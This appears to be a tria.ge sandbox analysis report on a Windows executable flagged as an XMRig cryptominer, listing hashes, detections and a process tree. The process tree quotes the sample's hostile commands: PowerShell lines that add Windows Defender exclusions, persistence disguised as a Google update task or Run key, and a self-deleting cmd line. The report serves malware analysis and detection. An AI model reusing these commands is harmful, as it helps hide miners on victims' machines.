Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

11/02/2025, 16:33

250211-t2ztsstkey 10

11/02/2025, 16:33

250211-t2zh2atkex 10

11/02/2025, 16:33

250211-t2yxhatkew 10

11/02/2025, 16:33

250211-t2nrjasqdk 10

24/10/2024, 20:12

241024-yyvg5asemn 10

24/10/2024, 20:11

241024-yygk9ssemk 10

24/10/2024, 20:11

241024-yygahasemj 10

24/10/2024, 20:11

241024-yyd55sselq 10

24/10/2024, 20:08

241024-yw247asdqp 10

24/10/2024, 20:08

241024-yw1lcssdqn 10

Analysis

  • max time kernel
    1800s
  • max time network
    1783s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    22/08/2024, 20:59

General

  • Target

    grhddhsGHswgh/qM5GMXBk6hJE6Y5e (16).exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1380
      • C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (16).exe
        "C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (16).exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1696
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1708
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2776
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:3008
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2888
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:2568
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (16).exe"
          2⤵
          • Deletes itself
          • Suspicious use of WriteProcessMemory
          PID:2312
          • C:\Windows\System32\choice.exe
            choice /C Y /N /D Y /T 3
            3⤵
              PID:2900
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2364
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2088
            • C:\Windows\system32\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
              3⤵
              • Scheduled Task/Job: Scheduled Task
              PID:2848
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:2964
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:2560
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Name, VideoProcessor
              3⤵
              • Detects videocard installed
              • Modifies data under HKEY_USERS
              • Suspicious use of AdjustPrivilegeToken
              PID:2896
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:2952
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1784
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {82037BB8-77AD-4E8A-924F-BFE5D302E7C5} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2592
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:272

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Libs\g.log

          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          207372c3bfe3d7eaead45872f10b67dd

          SHA1

          d9af318cb4abbb5ea90f2844e245df73f196f612

          SHA256

          73af238743ca6c4ca1b2d2b747bd1e3ff5fff57560b542af74e363474dc7eb69

          SHA512

          610b4a4154e696d9c93b3b76e0d33f3d215cb70472b5f928ffed20ec6a5b274ea6b90709ccda01cd7fa28310a87c01aa34c3854957e91ff92a50441c919afb75

        • \Program Files\Google\Chrome\updater.exe

          Filesize

          2.0MB

          MD5

          a16a669a09bf158058b83e04e69fe38e

          SHA1

          f6c94763850d9e590d86057139e8895a7aacdeea

          SHA256

          cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

          SHA512

          658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

        • memory/272-31-0x000000013FE40000-0x0000000140051000-memory.dmp

          Filesize

          2.1MB

        • memory/272-41-0x000000013FE40000-0x0000000140051000-memory.dmp

          Filesize

          2.1MB

        • memory/1696-22-0x000000013F570000-0x000000013F781000-memory.dmp

          Filesize

          2.1MB

        • memory/1696-0-0x000000013F570000-0x000000013F781000-memory.dmp

          Filesize

          2.1MB

        • memory/1708-8-0x000007FEF4DC0000-0x000007FEF575D000-memory.dmp

          Filesize

          9.6MB

        • memory/1708-12-0x000007FEF4DC0000-0x000007FEF575D000-memory.dmp

          Filesize

          9.6MB

        • memory/1708-11-0x000007FEF4DC0000-0x000007FEF575D000-memory.dmp

          Filesize

          9.6MB

        • memory/1708-10-0x000007FEF4DC0000-0x000007FEF575D000-memory.dmp

          Filesize

          9.6MB

        • memory/1708-9-0x000007FEF4DC0000-0x000007FEF575D000-memory.dmp

          Filesize

          9.6MB

        • memory/1708-7-0x0000000001E40000-0x0000000001E48000-memory.dmp

          Filesize

          32KB

        • memory/1708-6-0x000000001B650000-0x000000001B932000-memory.dmp

          Filesize

          2.9MB

        • memory/1708-5-0x000007FEF507E000-0x000007FEF507F000-memory.dmp

          Filesize

          4KB

        • memory/1784-50-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-84-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-100-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-40-0x00000000001F0000-0x0000000000210000-memory.dmp

          Filesize

          128KB

        • memory/1784-39-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-44-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-43-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-98-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-46-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-48-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-96-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-94-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-52-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-54-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-56-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-58-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-60-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-62-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-64-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-66-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-68-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-70-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-72-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-74-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-76-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-78-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-80-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-82-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-92-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-86-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-88-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/1784-90-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2776-20-0x0000000001D50000-0x0000000001D58000-memory.dmp

          Filesize

          32KB

        • memory/2776-18-0x0000000002B30000-0x0000000002BB0000-memory.dmp

          Filesize

          512KB

        • memory/2776-19-0x000000001B520000-0x000000001B802000-memory.dmp

          Filesize

          2.9MB

        • memory/2964-47-0x0000000140000000-0x0000000140016000-memory.dmp

          Filesize

          88KB

        • memory/2964-42-0x0000000140000000-0x0000000140016000-memory.dmp

          Filesize

          88KB